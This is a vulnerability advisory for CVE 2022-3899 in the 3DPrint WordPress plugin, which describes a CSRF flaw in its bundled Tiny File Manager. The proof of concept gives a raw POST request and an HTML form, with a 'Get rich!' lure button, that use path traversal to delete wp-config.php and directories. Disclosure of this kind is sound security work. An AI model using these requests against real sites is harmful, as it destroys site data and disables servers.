3DPrint < 3.5.6.9 – Arbitrary File and Directory Deletion via CSRF | CVE 2022-3899

Description

The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.

Proof of Concept

== RAW POST Request==

POST /wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php HTTP/1.1
Host: example.com
Cookie: [admin+]
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

group=1&delete=1&file%5b0%5d=../2022&file%5b1%5d=../../../wp-config.php

== HTML form ==

<form action="https://example.com//wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
    <input type="hidden" name="group" value="1">
    <input type="hidden" name="delete" value="1">
    <input type="hidden" name="file[1]" value="../2020">
    <input type="hidden" name="file[2]" value="../../../wp-config.php">
    <input type="submit" value="Get rich!">
</form>

== Notes ==

The value of 'group' and 'delete' can be anything, they are never used.
The file path of the files and dirs to delete is relative to the plugin upload root, 'wp-content/uploads/p3d'. Directories are deleted recursively.